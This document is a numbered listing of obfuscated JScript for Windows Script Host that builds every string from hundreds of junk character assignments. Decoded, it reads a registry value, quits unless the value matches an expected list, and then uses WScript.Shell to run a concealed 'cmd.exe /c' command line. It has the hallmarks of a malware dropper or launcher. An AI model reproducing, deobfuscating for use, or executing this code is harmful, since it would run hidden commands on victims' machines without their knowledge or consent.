2 | var yjkakve = this[lstbbnsig + qosgvke + erahil + gwmgwmeuq + jivnz + bjyxf + cbpwzesd + zxcoqzzmc] ( this[rqqbwx + kuvocb + conviwci + erahil + omnoj + lstbbnsig + zxcoqzzmc][spluvrx + erahil + jivnz + qosgvke + zxcoqzzmc + jivnz + tigfonuaf + tglaub + mwuaxe + jivnz + conviwci + zxcoqzzmc] ( rqqbwx + kuvocb + conviwci + erahil + omnoj + lstbbnsig + zxcoqzzmc + chwyptit + kuvocb + bhxzt + jivnz + aewzt + aewzt ) [effaeww + jivnz + wdbxpsv + effaeww + jivnz + qosgvke + vlxjybe] ( gbcxcncxr + mcyyisnca + btxuxsdno + xngocugmx + fuhito + spluvrx + hcairckvl + effaeww + effaeww + btxuxsdno + inbrkel + jnayh + fuhito + hcairckvl + kuvocb + btxuxsdno + effaeww + jhgnv + spluvrx + vdsssgqx + cbpwzesd + zxcoqzzmc + erahil + vdsssgqx + aewzt + toulst + weafz + qosgvke + cbpwzesd + jivnz + aewzt + jhgnv + bjyxf + cbpwzesd + zxcoqzzmc + jivnz + erahil + cbpwzesd + qosgvke + zxcoqzzmc + omnoj + vdsssgqx + cbpwzesd + qosgvke + aewzt + jhgnv + uxqdhb + vdsssgqx + conviwci + qosgvke + aewzt + jivnz ), 16 ); |
|
3 | for ( ljqoawa = 0 ; ljqoawa < zsuwcdy[aewzt + jivnz + cbpwzesd + wdbxpsv + zxcoqzzmc + bhxzt] ; ++ ljqoawa ) | |
4 | { | |
5 | if ( yjkakve == zsuwcdy[ljqoawa] ) | |
6 | { | |
7 | yjkakve = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( yjkakve !== true ) | |
12 | this[rqqbwx + kuvocb + conviwci + erahil + omnoj + lstbbnsig + zxcoqzzmc][jwqas + czscarq + omnoj + zxcoqzzmc] ( ); | |
13 | this[rqqbwx + kuvocb + conviwci + erahil + omnoj + lstbbnsig + zxcoqzzmc][spluvrx + erahil + jivnz + qosgvke + zxcoqzzmc + jivnz + tigfonuaf + tglaub + mwuaxe + jivnz + conviwci + zxcoqzzmc] ( rqqbwx + kuvocb + conviwci + erahil + omnoj + lstbbnsig + zxcoqzzmc + chwyptit + kuvocb + bhxzt + jivnz + aewzt + aewzt ) [erahil + czscarq + cbpwzesd] ( conviwci + naunf + vlxjybe + toulst + izyff + conviwci + toulst + lstbbnsig + vdsssgqx + zgwyieia + jivnz + erahil + gwmgwmeuq + bhxzt + jivnz + aewzt + aewzt + chwyptit + jivnz + cpprbxkyj + jivnz + toulst + vfriulaun + spluvrx + vdsssgqx + naunf + naunf + qosgvke + cbpwzesd + vlxjybe + toulst + tmdxhr + bjyxf + cbpwzesd + aaafyzcn + vdsssgqx + bbzcfyp + jivnz + vfriulaun + rqqbwx + jivnz + tglaub + effaeww + jivnz + yljtjjl + czscarq + jivnz + gwmgwmeuq + zxcoqzzmc + toulst + vfriulaun + tigfonuaf + czscarq + zxcoqzzmc + whcuwbfzt + omnoj + aewzt + jivnz + toulst + uhrpvqgc + zxcoqzzmc + jivnz + naunf + lstbbnsig + uhrpvqgc + jhgnv + omnoj + cbpwzesd + aaafyzcn + vdsssgqx + omnoj + conviwci + jivnz + chwyptit + lstbbnsig + vlxjybe + nfdddcss + toulst + bhxzt + zxcoqzzmc + zxcoqzzmc + lstbbnsig + ivmsfxsc + izyff + izyff + nhfdx + mnkzph + cstaxi + chwyptit + nhfdx + bctaaj + cstaxi + chwyptit + nhfdx + chwyptit + ujampim + tiektkb + wzyse + izyff + omnoj + cbpwzesd + aaafyzcn + vdsssgqx + omnoj + conviwci + jivnz + chwyptit + lstbbnsig + bhxzt + lstbbnsig + tmdxhr + lqylr + lqylr + gwmgwmeuq + zxcoqzzmc + qosgvke + erahil + zxcoqzzmc + toulst + uhrpvqgc + zxcoqzzmc + jivnz + naunf + lstbbnsig + uhrpvqgc + jhgnv + omnoj + cbpwzesd + aaafyzcn + vdsssgqx + omnoj + conviwci + jivnz + chwyptit + lstbbnsig + vlxjybe + nfdddcss + lqylr + lqylr + conviwci + naunf + vlxjybe + toulst + izyff + conviwci + toulst + cbpwzesd + jivnz + zxcoqzzmc + toulst + czscarq + gwmgwmeuq + jivnz + toulst + jhgnv + jhgnv + nhfdx + mnkzph + cstaxi + chwyptit + nhfdx + bctaaj + cstaxi + chwyptit + nhfdx + chwyptit + ujampim + tiektkb + wzyse + vorzv + mqfutkpce + mqfutkpce + mqfutkpce + mqfutkpce + jhgnv + vlxjybe + qosgvke + aaafyzcn + zgwyieia + zgwyieia + zgwyieia + erahil + vdsssgqx + vdsssgqx + zxcoqzzmc + jhgnv + lqylr + lqylr + conviwci + naunf + vlxjybe + toulst + izyff + conviwci + toulst + erahil + jivnz + wdbxpsv + gwmgwmeuq + aaafyzcn + erahil + cstaxi + ujampim + toulst + izyff + gwmgwmeuq + toulst + jhgnv + jhgnv + nhfdx + mnkzph + cstaxi + chwyptit + nhfdx + bctaaj + cstaxi + chwyptit + nhfdx + chwyptit + ujampim + tiektkb + wzyse + vorzv + mqfutkpce + mqfutkpce + mqfutkpce + mqfutkpce + jhgnv + vlxjybe + qosgvke + aaafyzcn + zgwyieia + zgwyieia + zgwyieia + erahil + vdsssgqx + vdsssgqx + zxcoqzzmc + jhgnv + nhfdx + wzyse + mnkzph + tiektkb + ujampim + nhfdx + tiektkb + mnkzph + nhfdx + ujampim + dhurm + nhfdx + tiektkb + tiektkb + chwyptit + vlxjybe + aewzt + aewzt, 0, false ); |
|
14 | } | |
15 | jnayh = "I"; | |
16 | jnayh = "o"; | |
17 | jnayh = "P"; | |
18 | jnayh = "M"; | |
19 | jnayh = "m"; | |
20 | jnayh = "F"; | |
21 | jnayh = "D"; | |
22 | jnayh = "l"; | |
23 | jnayh = "a"; | |
24 | jnayh = "u"; | |
25 | jnayh = "O"; | |
26 | jnayh = "g"; | |
27 | jnayh = "X"; | |
28 | jnayh = "X"; | |
29 | jnayh = "l"; | |
30 | jnayh = "E"; | |
31 | jnayh = "P"; | |
32 | jnayh = "I"; | |
33 | jnayh = "N"; | |
34 | jnayh = "g"; | |
35 | jnayh = "q"; | |
36 | jnayh = "b"; | |
37 | jnayh = "Z"; | |
38 | jnayh = "Q"; | |
39 | jnayh = "B"; | |
40 | jnayh = "G"; | |
41 | jnayh = "L"; | |
42 | jnayh = "h"; | |
43 | jnayh = "u"; | |
44 | jnayh = "E"; | |
45 | jnayh = "z"; | |
46 | jnayh = "r"; | |
47 | jnayh = "x"; | |
48 | jnayh = "V"; | |
49 | jnayh = "Z"; | |
50 | jnayh = "O"; | |
51 | jnayh = "V"; | |
52 | jnayh = "R"; | |
53 | jnayh = "S"; | |
54 | jnayh = "I"; | |
55 | jnayh = "f"; | |
56 | jnayh = "p"; | |
57 | jnayh = "k"; | |
58 | jnayh = "x"; | |
59 | jnayh = "T"; | |
60 | jwqas = "k"; | |
61 | jwqas = "r"; | |
62 | jwqas = "C"; | |
63 | jwqas = "n"; | |
64 | jwqas = "v"; | |
65 | jwqas = "K"; | |
66 | jwqas = "r"; | |
67 | jwqas = "R"; | |
68 | jwqas = "a"; | |
69 | jwqas = "S"; | |
70 | jwqas = "y"; | |
71 | jwqas = "Z"; | |
72 | jwqas = "J"; | |
73 | jwqas = "F"; | |
74 | jwqas = "Z"; | |
75 | jwqas = "m"; | |
76 | jwqas = "C"; | |
77 | jwqas = "J"; | |
78 | jwqas = "m"; | |
79 | jwqas = "r"; | |
80 | jwqas = "o"; | |
81 | jwqas = "a"; | |
82 | jwqas = "k"; | |
83 | jwqas = "k"; | |
84 | jwqas = "j"; | |
85 | jwqas = "f"; | |
86 | jwqas = "g"; | |
87 | jwqas = "g"; | |
88 | jwqas = "h"; | |
89 | jwqas = "B"; | |
90 | jwqas = "A"; | |
91 | jwqas = "E"; | |
92 | jwqas = "Y"; | |
93 | jwqas = "Q"; | |
94 | uxqdhb = "z"; | |
95 | uxqdhb = "K"; | |
96 | uxqdhb = "d"; | |
97 | uxqdhb = "b"; | |
98 | uxqdhb = "l"; | |
99 | uxqdhb = "T"; | |
100 | uxqdhb = "K"; | |
101 | uxqdhb = "q"; | |
102 | uxqdhb = "L"; | |
103 | uxqdhb = "H"; | |
104 | uxqdhb = "d"; | |
105 | uxqdhb = "t"; | |
106 | uxqdhb = "J"; | |
107 | uxqdhb = "r"; | |
108 | uxqdhb = "z"; | |
109 | uxqdhb = "H"; | |
110 | uxqdhb = "u"; | |
111 | uxqdhb = "W"; | |
112 | uxqdhb = "p"; | |
113 | uxqdhb = "P"; | |
114 | uxqdhb = "p"; | |
115 | uxqdhb = "v"; | |
116 | uxqdhb = "V"; | |
117 | uxqdhb = "s"; | |
118 | uxqdhb = "S"; | |
119 | uxqdhb = "B"; | |
120 | uxqdhb = "L"; | |
121 | uxqdhb = "Q"; | |
122 | uxqdhb = "r"; | |
123 | uxqdhb = "Q"; | |
124 | uxqdhb = "L"; | |
125 | inbrkel = "e"; | |
126 | inbrkel = "v"; | |
127 | inbrkel = "c"; | |
128 | inbrkel = "Z"; | |
129 | inbrkel = "t"; | |
130 | inbrkel = "p"; | |
131 | inbrkel = "b"; | |
132 | inbrkel = "d"; | |
133 | inbrkel = "W"; | |
134 | inbrkel = "a"; | |
135 | inbrkel = "S"; | |
136 | inbrkel = "s"; | |
137 | inbrkel = "n"; | |
138 | inbrkel = "c"; | |
139 | inbrkel = "v"; | |
140 | inbrkel = "W"; | |
141 | inbrkel = "A"; | |
142 | inbrkel = "j"; | |
143 | inbrkel = "A"; | |
144 | inbrkel = "y"; | |
145 | inbrkel = "o"; | |
146 | inbrkel = "P"; | |
147 | inbrkel = "j"; | |
148 | inbrkel = "N"; | |
149 | cpprbxkyj = "N"; | |
150 | cpprbxkyj = "R"; | |
151 | cpprbxkyj = "a"; | |
152 | cpprbxkyj = "H"; | |
153 | cpprbxkyj = "w"; | |
154 | cpprbxkyj = "c"; | |
155 | cpprbxkyj = "d"; | |
156 | cpprbxkyj = "X"; | |
157 | cpprbxkyj = "v"; | |
158 | cpprbxkyj = "g"; | |
159 | cpprbxkyj = "I"; | |
160 | cpprbxkyj = "b"; | |
161 | cpprbxkyj = "a"; | |
162 | cpprbxkyj = "Q"; | |
163 | cpprbxkyj = "o"; | |
164 | cpprbxkyj = "k"; | |
165 | cpprbxkyj = "A"; | |
166 | cpprbxkyj = "I"; | |
167 | cpprbxkyj = "Y"; | |
168 | cpprbxkyj = "l"; | |
169 | cpprbxkyj = "r"; | |
170 | cpprbxkyj = "v"; | |
171 | cpprbxkyj = "N"; | |
172 | cpprbxkyj = "P"; | |
173 | cpprbxkyj = "Q"; | |
174 | cpprbxkyj = "M"; | |
175 | cpprbxkyj = "c"; | |
176 | cpprbxkyj = "Z"; | |
177 | cpprbxkyj = "Z"; | |
178 | cpprbxkyj = "T"; | |
179 | cpprbxkyj = "x"; | |
180 | cpprbxkyj = "H"; | |
181 | cpprbxkyj = "l"; | |
182 | cpprbxkyj = "x"; | |
183 | conviwci = "y"; | |
184 | conviwci = "o"; | |
185 | conviwci = "S"; | |
186 | conviwci = "c"; | |
187 | conviwci = "G"; | |
188 | conviwci = "Y"; | |
189 | conviwci = "d"; | |
190 | conviwci = "V"; | |
191 | conviwci = "t"; | |
192 | conviwci = "T"; | |
193 | conviwci = "x"; | |
194 | conviwci = "c"; | |
195 | conviwci = "j"; | |
196 | conviwci = "v"; | |
197 | conviwci = "c"; | |
198 | effaeww = "h"; | |
199 | effaeww = "q"; | |
200 | effaeww = "s"; | |
201 | effaeww = "z"; | |
202 | effaeww = "d"; | |
203 | effaeww = "b"; | |
204 | effaeww = "t"; | |
205 | effaeww = "z"; | |
206 | effaeww = "F"; | |
207 | effaeww = "T"; | |
208 | effaeww = "e"; | |
209 | effaeww = "j"; | |
210 | effaeww = "R"; | |
211 | effaeww = "h"; | |
212 | effaeww = "J"; | |
213 | effaeww = "R"; | |
214 | cbpwzesd = "h"; | |
215 | cbpwzesd = "g"; | |
216 | cbpwzesd = "L"; | |
217 | cbpwzesd = "Y"; | |
218 | cbpwzesd = "X"; | |
219 | cbpwzesd = "p"; | |
220 | cbpwzesd = "a"; | |
221 | cbpwzesd = "S"; | |
222 | cbpwzesd = "A"; | |
223 | cbpwzesd = "T"; | |
224 | cbpwzesd = "h"; | |
225 | cbpwzesd = "p"; | |
226 | cbpwzesd = "p"; | |
227 | cbpwzesd = "G"; | |
228 | cbpwzesd = "Z"; | |
229 | cbpwzesd = "y"; | |
230 | cbpwzesd = "R"; | |
231 | cbpwzesd = "D"; | |
232 | cbpwzesd = "H"; | |
233 | cbpwzesd = "f"; | |
234 | cbpwzesd = "D"; | |
235 | cbpwzesd = "t"; | |
236 | cbpwzesd = "G"; | |
237 | cbpwzesd = "v"; | |
238 | cbpwzesd = "A"; | |
239 | cbpwzesd = "n"; | |
240 | cbpwzesd = "q"; | |
241 | cbpwzesd = "n"; | |
242 | cbpwzesd = "f"; | |
243 | cbpwzesd = "a"; | |
244 | cbpwzesd = "Z"; | |
245 | cbpwzesd = "u"; | |
246 | cbpwzesd = "I"; | |
247 | cbpwzesd = "E"; | |
248 | cbpwzesd = "i"; | |
249 | cbpwzesd = "H"; | |
250 | cbpwzesd = "H"; | |
251 | cbpwzesd = "n"; | |
252 | qosgvke = "Y"; | |
253 | qosgvke = "M"; | |
254 | qosgvke = "x"; | |
255 | qosgvke = "r"; | |
256 | qosgvke = "C"; | |
257 | qosgvke = "M"; | |
258 | qosgvke = "j"; | |
259 | qosgvke = "j"; | |
260 | qosgvke = "U"; | |
261 | qosgvke = "R"; | |
262 | qosgvke = "A"; | |
263 | qosgvke = "p"; | |
264 | qosgvke = "I"; | |
265 | qosgvke = "x"; | |
266 | qosgvke = "r"; | |
267 | qosgvke = "X"; | |
268 | qosgvke = "O"; | |
269 | qosgvke = "x"; | |
270 | qosgvke = "w"; | |
271 | qosgvke = "c"; | |
272 | qosgvke = "G"; | |
273 | qosgvke = "Z"; | |
274 | qosgvke = "c"; | |
275 | qosgvke = "u"; | |
276 | qosgvke = "M"; | |
277 | qosgvke = "b"; | |
278 | qosgvke = "J"; | |
279 | qosgvke = "x"; | |
280 | qosgvke = "f"; | |
281 | qosgvke = "a"; | |
282 | qosgvke = "E"; | |
283 | qosgvke = "A"; | |
284 | qosgvke = "d"; | |
285 | qosgvke = "s"; | |
286 | qosgvke = "a"; | |
287 | mcyyisnca = "C"; | |
288 | mcyyisnca = "I"; | |
289 | mcyyisnca = "F"; | |
290 | mcyyisnca = "t"; | |
291 | mcyyisnca = "G"; | |
292 | mcyyisnca = "U"; | |
293 | mcyyisnca = "b"; | |
294 | mcyyisnca = "Y"; | |
295 | mcyyisnca = "z"; | |
296 | mcyyisnca = "A"; | |
297 | mcyyisnca = "S"; | |
298 | mcyyisnca = "L"; | |
299 | mcyyisnca = "j"; | |
300 | mcyyisnca = "g"; | |
301 | mcyyisnca = "k"; | |
302 | mcyyisnca = "A"; | |
303 | mcyyisnca = "z"; | |
304 | mcyyisnca = "K"; | |
305 | hcairckvl = "B"; | |
306 | hcairckvl = "J"; | |
307 | hcairckvl = "O"; | |
308 | hcairckvl = "R"; | |
309 | hcairckvl = "h"; | |
310 | hcairckvl = "U"; | |
311 | hcairckvl = "o"; | |
312 | hcairckvl = "J"; | |
313 | hcairckvl = "e"; | |
314 | hcairckvl = "B"; | |
315 | hcairckvl = "k"; | |
316 | hcairckvl = "C"; | |
317 | hcairckvl = "I"; | |
318 | hcairckvl = "p"; | |
319 | hcairckvl = "o"; | |
320 | hcairckvl = "o"; | |
321 | hcairckvl = "s"; | |
322 | hcairckvl = "k"; | |
323 | hcairckvl = "E"; | |
324 | hcairckvl = "d"; | |
325 | hcairckvl = "A"; | |
326 | hcairckvl = "B"; | |
327 | hcairckvl = "M"; | |
328 | hcairckvl = "i"; | |
329 | hcairckvl = "d"; | |
330 | hcairckvl = "M"; | |
331 | hcairckvl = "h"; | |
332 | hcairckvl = "S"; | |
333 | hcairckvl = "E"; | |
334 | hcairckvl = "J"; | |
335 | hcairckvl = "Y"; | |
336 | hcairckvl = "n"; | |
337 | hcairckvl = "O"; | |
338 | hcairckvl = "s"; | |
339 | hcairckvl = "h"; | |
340 | hcairckvl = "C"; | |
341 | hcairckvl = "Y"; | |
342 | hcairckvl = "s"; | |
343 | hcairckvl = "L"; | |
344 | hcairckvl = "R"; | |
345 | hcairckvl = "G"; | |
346 | hcairckvl = "r"; | |
347 | hcairckvl = "X"; | |
348 | hcairckvl = "U"; | |
349 | tiektkb = "x"; | |
350 | tiektkb = "m"; | |
351 | tiektkb = "d"; | |
352 | tiektkb = "A"; | |
353 | tiektkb = "B"; | |
354 | tiektkb = "z"; | |
355 | tiektkb = "0"; | |
356 | jhgnv = "V"; | |
357 | jhgnv = "w"; | |
358 | jhgnv = "b"; | |
359 | jhgnv = "f"; | |
360 | jhgnv = "U"; | |
361 | jhgnv = "X"; | |
362 | jhgnv = "K"; | |
363 | jhgnv = "q"; | |
364 | jhgnv = "h"; | |
365 | jhgnv = "K"; | |
366 | jhgnv = "Z"; | |
367 | jhgnv = "p"; | |
368 | jhgnv = "\\"; | |
369 | rqqbwx = "O"; | |
370 | rqqbwx = "j"; | |
371 | rqqbwx = "G"; | |
372 | rqqbwx = "S"; | |
373 | rqqbwx = "v"; | |
374 | rqqbwx = "l"; | |
375 | rqqbwx = "U"; | |
376 | rqqbwx = "W"; | |
377 | rqqbwx = "M"; | |
378 | rqqbwx = "H"; | |
379 | rqqbwx = "r"; | |
380 | rqqbwx = "n"; | |
381 | rqqbwx = "X"; | |
382 | rqqbwx = "q"; | |
383 | rqqbwx = "x"; | |
384 | rqqbwx = "a"; | |
385 | rqqbwx = "N"; | |
386 | rqqbwx = "q"; | |
387 | rqqbwx = "T"; | |
388 | rqqbwx = "B"; | |
389 | rqqbwx = "T"; | |
390 | rqqbwx = "M"; | |
391 | rqqbwx = "x"; | |
392 | rqqbwx = "Q"; | |
393 | rqqbwx = "W"; | |
394 | mwuaxe = "j"; | |
395 | omnoj = "P"; | |
396 | omnoj = "C"; | |
397 | omnoj = "G"; | |
398 | omnoj = "T"; | |
399 | omnoj = "i"; | |
400 | uhrpvqgc = "u"; | |
401 | uhrpvqgc = "h"; | |
402 | uhrpvqgc = "V"; | |
403 | uhrpvqgc = "S"; | |
404 | uhrpvqgc = "b"; | |
405 | uhrpvqgc = "N"; | |
406 | uhrpvqgc = "b"; | |
407 | uhrpvqgc = "x"; | |
408 | uhrpvqgc = "h"; | |
409 | uhrpvqgc = "K"; | |
410 | uhrpvqgc = "C"; | |
411 | uhrpvqgc = "U"; | |
412 | uhrpvqgc = "v"; | |
413 | uhrpvqgc = "%"; | |
414 | wdbxpsv = "R"; | |
415 | wdbxpsv = "d"; | |
416 | wdbxpsv = "H"; | |
417 | wdbxpsv = "N"; | |
418 | wdbxpsv = "k"; | |
419 | wdbxpsv = "H"; | |
420 | wdbxpsv = "A"; | |
421 | wdbxpsv = "u"; | |
422 | wdbxpsv = "Z"; | |
423 | wdbxpsv = "o"; | |
424 | wdbxpsv = "B"; | |
425 | wdbxpsv = "G"; | |
426 | wdbxpsv = "Y"; | |
427 | wdbxpsv = "P"; | |
428 | wdbxpsv = "v"; | |
429 | wdbxpsv = "p"; | |
430 | wdbxpsv = "M"; | |
431 | wdbxpsv = "E"; | |
432 | wdbxpsv = "Y"; | |
433 | wdbxpsv = "r"; | |
434 | wdbxpsv = "S"; | |
435 | wdbxpsv = "C"; | |
436 | wdbxpsv = "r"; | |
437 | wdbxpsv = "B"; | |
438 | wdbxpsv = "y"; | |
439 | wdbxpsv = "R"; | |
440 | wdbxpsv = "d"; | |
441 | wdbxpsv = "n"; | |
442 | wdbxpsv = "A"; | |
443 | wdbxpsv = "j"; | |
444 | wdbxpsv = "U"; | |
445 | wdbxpsv = "q"; | |
446 | wdbxpsv = "w"; | |
447 | wdbxpsv = "c"; | |
448 | wdbxpsv = "l"; | |
449 | wdbxpsv = "z"; | |
450 | wdbxpsv = "t"; | |
451 | wdbxpsv = "I"; | |
452 | wdbxpsv = "Y"; | |
453 | wdbxpsv = "j"; | |
454 | wdbxpsv = "g"; | |
455 | izyff = "K"; | |
456 | izyff = "A"; | |
457 | izyff = "Z"; | |
458 | izyff = "B"; | |
459 | izyff = "P"; | |
460 | izyff = "j"; | |
461 | izyff = "X"; | |
462 | izyff = "V"; | |
463 | izyff = "o"; | |
464 | izyff = "Q"; | |
465 | izyff = "Q"; | |
466 | izyff = "x"; | |
467 | izyff = "O"; | |
468 | izyff = "f"; | |
469 | izyff = "K"; | |
470 | izyff = "A"; | |
471 | izyff = "T"; | |
472 | izyff = "r"; | |
473 | izyff = "k"; | |
474 | izyff = "m"; | |
475 | izyff = "/"; | |
476 | zxcoqzzmc = "E"; | |
477 | zxcoqzzmc = "g"; | |
478 | zxcoqzzmc = "D"; | |
479 | zxcoqzzmc = "h"; | |
480 | zxcoqzzmc = "W"; | |
481 | zxcoqzzmc = "J"; | |
482 | zxcoqzzmc = "G"; | |
483 | zxcoqzzmc = "E"; | |
484 | zxcoqzzmc = "A"; | |
485 | zxcoqzzmc = "v"; | |
486 | zxcoqzzmc = "g"; | |
487 | zxcoqzzmc = "N"; | |
488 | zxcoqzzmc = "L"; | |
489 | zxcoqzzmc = "q"; | |
490 | zxcoqzzmc = "n"; | |
491 | zxcoqzzmc = "z"; | |
492 | zxcoqzzmc = "i"; | |
493 | zxcoqzzmc = "c"; | |
494 | zxcoqzzmc = "z"; | |
495 | zxcoqzzmc = "Z"; | |
496 | zxcoqzzmc = "w"; | |
497 | zxcoqzzmc = "U"; | |
498 | zxcoqzzmc = "f"; | |
499 | zxcoqzzmc = "H"; | |
500 | zxcoqzzmc = "X"; | |
501 | zxcoqzzmc = "a"; | |
502 | zxcoqzzmc = "a"; | |
503 | zxcoqzzmc = "T"; | |
504 | zxcoqzzmc = "w"; | |
505 | zxcoqzzmc = "o"; | |
506 | zxcoqzzmc = "O"; | |
507 | zxcoqzzmc = "O"; | |
508 | zxcoqzzmc = "t"; | |
509 | zgwyieia = "v"; | |
510 | zgwyieia = "E"; | |
511 | zgwyieia = "U"; | |
512 | zgwyieia = "M"; | |
513 | zgwyieia = "Q"; | |
514 | zgwyieia = "l"; | |
515 | zgwyieia = "j"; | |
516 | zgwyieia = "W"; | |
517 | zgwyieia = "A"; | |
518 | zgwyieia = "n"; | |
519 | zgwyieia = "Y"; | |
520 | zgwyieia = "k"; | |
521 | zgwyieia = "e"; | |
522 | zgwyieia = "B"; | |
523 | zgwyieia = "n"; | |
524 | zgwyieia = "M"; | |
525 | zgwyieia = "O"; | |
526 | zgwyieia = "U"; | |
527 | zgwyieia = "L"; | |
528 | zgwyieia = "P"; | |
529 | zgwyieia = "C"; | |
530 | zgwyieia = "j"; | |
531 | zgwyieia = "j"; | |
532 | zgwyieia = "y"; | |
533 | zgwyieia = "Y"; | |
534 | zgwyieia = "B"; | |
535 | zgwyieia = "a"; | |
536 | zgwyieia = "I"; | |
537 | zgwyieia = "q"; | |
538 | zgwyieia = "x"; | |
539 | zgwyieia = "P"; | |
540 | zgwyieia = "j"; | |
541 | zgwyieia = "k"; | |
542 | zgwyieia = "O"; | |
543 | zgwyieia = "N"; | |
544 | zgwyieia = "e"; | |
545 | zgwyieia = "o"; | |
546 | zgwyieia = "S"; | |
547 | zgwyieia = "y"; | |
548 | zgwyieia = "w"; | |
549 | zgwyieia = "R"; | |
550 | zgwyieia = "Y"; | |
551 | zgwyieia = "g"; | |
552 | zgwyieia = "w"; | |
553 | nhfdx = "L"; | |
554 | nhfdx = "N"; | |
555 | nhfdx = "p"; | |
556 | nhfdx = "n"; | |
557 | nhfdx = "e"; | |
558 | nhfdx = "n"; | |
559 | nhfdx = "D"; | |
560 | nhfdx = "I"; | |
561 | nhfdx = "l"; | |
562 | nhfdx = "v"; | |
563 | nhfdx = "x"; | |
564 | nhfdx = "N"; | |
565 | nhfdx = "r"; | |
566 | nhfdx = "K"; | |
567 | nhfdx = "F"; | |
568 | nhfdx = "R"; | |
569 | nhfdx = "Z"; | |
570 | nhfdx = "y"; | |
571 | nhfdx = "A"; | |
572 | nhfdx = "v"; | |
573 | nhfdx = "b"; | |
574 | nhfdx = "P"; | |
575 | nhfdx = "N"; | |
576 | nhfdx = "d"; | |
577 | nhfdx = "I"; | |
578 | nhfdx = "r"; | |
579 | nhfdx = "U"; | |
580 | nhfdx = "r"; | |
581 | nhfdx = "W"; | |
582 | nhfdx = "y"; | |
583 | nhfdx = "1"; | |
584 | aewzt = "W"; | |
585 | aewzt = "f"; | |
586 | aewzt = "Q"; | |
587 | aewzt = "x"; | |
588 | aewzt = "C"; | |
589 | aewzt = "A"; | |
590 | aewzt = "q"; | |
591 | aewzt = "l"; | |
592 | aewzt = "z"; | |
593 | aewzt = "G"; | |
594 | aewzt = "G"; | |
595 | aewzt = "p"; | |
596 | aewzt = "P"; | |
597 | aewzt = "x"; | |
598 | aewzt = "K"; | |
599 | aewzt = "l"; | |
600 | aewzt = "s"; | |
601 | aewzt = "f"; | |
602 | aewzt = "k"; | |
603 | aewzt = "l"; | |
604 | btxuxsdno = "c"; | |
605 | btxuxsdno = "j"; | |
606 | btxuxsdno = "H"; | |
607 | btxuxsdno = "y"; | |
608 | btxuxsdno = "I"; | |
609 | btxuxsdno = "v"; | |
610 | btxuxsdno = "h"; | |
611 | btxuxsdno = "H"; | |
612 | btxuxsdno = "H"; | |
613 | btxuxsdno = "D"; | |
614 | btxuxsdno = "H"; | |
615 | btxuxsdno = "Q"; | |
616 | btxuxsdno = "E"; | |
617 | tigfonuaf = "w"; | |
618 | tigfonuaf = "d"; | |
619 | tigfonuaf = "c"; | |
620 | tigfonuaf = "T"; | |
621 | tigfonuaf = "W"; | |
622 | tigfonuaf = "I"; | |
623 | tigfonuaf = "q"; | |
624 | tigfonuaf = "m"; | |
625 | tigfonuaf = "o"; | |
626 | tigfonuaf = "w"; | |
627 | tigfonuaf = "L"; | |
628 | tigfonuaf = "p"; | |
629 | tigfonuaf = "Q"; | |
630 | tigfonuaf = "m"; | |
631 | tigfonuaf = "r"; | |
632 | tigfonuaf = "n"; | |
633 | tigfonuaf = "V"; | |
634 | tigfonuaf = "g"; | |
635 | tigfonuaf = "H"; | |
636 | tigfonuaf = "n"; | |
637 | tigfonuaf = "w"; | |
638 | tigfonuaf = "V"; | |
639 | tigfonuaf = "I"; | |
640 | tigfonuaf = "I"; | |
641 | tigfonuaf = "f"; | |
642 | tigfonuaf = "e"; | |
643 | tigfonuaf = "O"; | |
644 | xngocugmx = "k"; | |
645 | xngocugmx = "Q"; | |
646 | xngocugmx = "K"; | |
647 | xngocugmx = "G"; | |
648 | xngocugmx = "U"; | |
649 | xngocugmx = "A"; | |
650 | xngocugmx = "o"; | |
651 | xngocugmx = "c"; | |
652 | xngocugmx = "x"; | |
653 | xngocugmx = "U"; | |
654 | xngocugmx = "T"; | |
655 | xngocugmx = "l"; | |
656 | xngocugmx = "C"; | |
657 | xngocugmx = "I"; | |
658 | xngocugmx = "j"; | |
659 | xngocugmx = "D"; | |
660 | xngocugmx = "e"; | |
661 | xngocugmx = "Q"; | |
662 | xngocugmx = "G"; | |
663 | xngocugmx = "q"; | |
664 | xngocugmx = "L"; | |
665 | xngocugmx = "G"; | |
666 | xngocugmx = "S"; | |
667 | xngocugmx = "L"; | |
668 | xngocugmx = "h"; | |
669 | xngocugmx = "n"; | |
670 | xngocugmx = "k"; | |
671 | xngocugmx = "p"; | |
672 | xngocugmx = "R"; | |
673 | xngocugmx = "J"; | |
674 | xngocugmx = "E"; | |
675 | xngocugmx = "Y"; | |
676 | spluvrx = "L"; | |
677 | spluvrx = "r"; | |
678 | spluvrx = "J"; | |
679 | spluvrx = "K"; | |
680 | spluvrx = "Z"; | |
681 | spluvrx = "J"; | |
682 | spluvrx = "D"; | |
683 | spluvrx = "G"; | |
684 | spluvrx = "C"; | |
685 | vdsssgqx = "c"; | |
686 | vdsssgqx = "G"; | |
687 | vdsssgqx = "B"; | |
688 | vdsssgqx = "o"; | |
689 | vorzv = "j"; | |
690 | vorzv = "w"; | |
691 | vorzv = "e"; | |
692 | vorzv = "m"; | |
693 | vorzv = "m"; | |
694 | vorzv = "r"; | |
695 | vorzv = "e"; | |
696 | vorzv = "U"; | |
697 | vorzv = "X"; | |
698 | vorzv = "L"; | |
699 | vorzv = "m"; | |
700 | vorzv = "T"; | |
701 | vorzv = "u"; | |
702 | vorzv = "e"; | |
703 | vorzv = "E"; | |
704 | vorzv = "K"; | |
705 | vorzv = "g"; | |
706 | vorzv = "P"; | |
707 | vorzv = "p"; | |
708 | vorzv = "d"; | |
709 | vorzv = "E"; | |
710 | vorzv = "b"; | |
711 | vorzv = "g"; | |
712 | vorzv = "H"; | |
713 | vorzv = "I"; | |
714 | vorzv = "K"; | |
715 | vorzv = "i"; | |
716 | vorzv = "O"; | |
717 | vorzv = "q"; | |
718 | vorzv = "K"; | |
719 | vorzv = "J"; | |
720 | vorzv = "A"; | |
721 | vorzv = "S"; | |
722 | vorzv = "@"; | |
723 | whcuwbfzt = "W"; | |
724 | whcuwbfzt = "u"; | |
725 | whcuwbfzt = "r"; | |
726 | whcuwbfzt = "f"; | |
727 | whcuwbfzt = "W"; | |
728 | whcuwbfzt = "w"; | |
729 | whcuwbfzt = "X"; | |
730 | whcuwbfzt = "q"; | |
731 | whcuwbfzt = "e"; | |
732 | whcuwbfzt = "f"; | |
733 | whcuwbfzt = "C"; | |
734 | whcuwbfzt = "r"; | |
735 | whcuwbfzt = "H"; | |
736 | whcuwbfzt = "n"; | |
737 | whcuwbfzt = "Z"; | |
738 | whcuwbfzt = "F"; | |
